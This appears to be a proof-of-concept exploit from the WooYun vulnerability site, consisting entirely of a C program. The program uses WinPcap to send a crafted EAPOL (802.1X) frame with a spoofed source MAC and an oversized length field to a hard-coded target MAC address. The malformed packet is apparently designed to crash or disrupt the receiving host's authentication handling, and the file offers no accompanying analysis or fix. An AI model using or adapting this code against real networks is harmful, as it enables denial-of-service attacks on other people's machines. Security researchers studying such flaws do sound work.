WooYun.org

#include <pcap.h>
#pragma comment( lib , "wpcap.lib" )
int _tmain(int argc, _TCHAR* argv[])
{
	pcap_t *fp;
	char errbuf[PCAP_ERRBUF_SIZE];
	u_char packet[3000];
	pcap_if_t *alldevs;
	/* Check the validity of the command line */
	if(pcap_findalldevs(&alldevs, errbuf) == -1)
	{
		fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
		exit(1);
	}
	pcap_if_t *d;
	int i = 0;
	/* Print the list */
	for(d=alldevs; d; d=d->next)
	{
		printf("%d. %s", ++i, d->name);
		if (d->description)
			printf(" (%s)\n", d->description);
		else
			printf(" (No description available)\n");
	}
	/* 选择相应网卡*/
	if ((fp = pcap_open_live(alldevs->name,		// name of the device
		65536,			// portion of the packet to capture. It doesn't matter in this case 
		1,				// promiscuous mode (nonzero means promiscuous)
		1000,			// read timeout
		errbuf			// error buffer
		)) == NULL)
	{
		fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);
		return 2;
	}
	memset( packet , 0 , 1000 );
	
	/* 目标机器mac地址 */
	packet[0]= 0x00;
	packet[1]= 0x0C;
	packet[2]= 0x29;
	packet[3]= 0x0F;
	packet[4]= 0x63;
	packet[5]= 0xDD;
	/* set mac source to 2:2:2:2:2:2 */
	packet[6]= 2;
	packet[7]= 2;
	packet[8]= 2;
	packet[9]= 2;
	packet[10]= 2;
	packet[11]= 2;
	/* 协议头 */
	packet[12] = 0x88;
	packet[13] = 0x8e;
	packet[14] = 0x01;
	packet[15] = 0x00;
	packet[16] = 0xFF;//>4
	packet[17] = 0xFF;//>4
	packet[18] = 0x03;
	
	packet[22] = 0x00;//
	packet[23] = 0x00;//
	packet[24] = 0x13;//
	packet[25] = 0x11;//
	packet[26] = 0xEE;//
	packet[27] = 0xFF;//
	/* Send down the packet */
	if (pcap_sendpacket(fp,	// Adapter
		packet,				// buffer with the packet
		100	// size
		) != 0)
	{
		fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
		return 3;
	}
	Sleep( 100 );
	if (pcap_sendpacket(fp,	// Adapter
		packet,				// buffer with the packet
		100					// size
		) != 0)
	{
		fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
		return 3;
	}
	pcap_close(fp);	
	return 0;
}